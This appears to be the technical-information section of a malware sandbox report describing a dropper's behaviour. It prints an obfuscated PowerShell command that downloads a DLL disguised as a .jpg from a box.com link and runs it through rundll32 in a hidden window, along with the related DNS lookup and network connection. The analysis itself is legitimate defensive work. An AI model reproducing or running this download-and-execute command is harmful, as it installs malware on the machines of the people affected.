Technical Information
- https://moroconfortoltdame.box.com/shared/static/bvukbse33im2e9ymokxhwf70dh3s8a0z.jpg as %temp%\mqcdivy_user_ehjhf.dll
- 'mo######ortoltdame.box.com':443
- DNS ASK mo######ortoltdame.box.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (New-object system.Net.webclieNt).dowNloadfile('""https://moroconfortoltdame.box.com/shared/static/bvukbse33im2e9ymokxhwf70dh3s8a0z.jpg','%TEMP%\mqcdivy_user_ehjhf.dll');start-process rUNdll32....' (with hidden window)
- '<SYSTEM32>\rundll32.exe' %TEMP%\mqcdivy_user_ehjhf.dll starter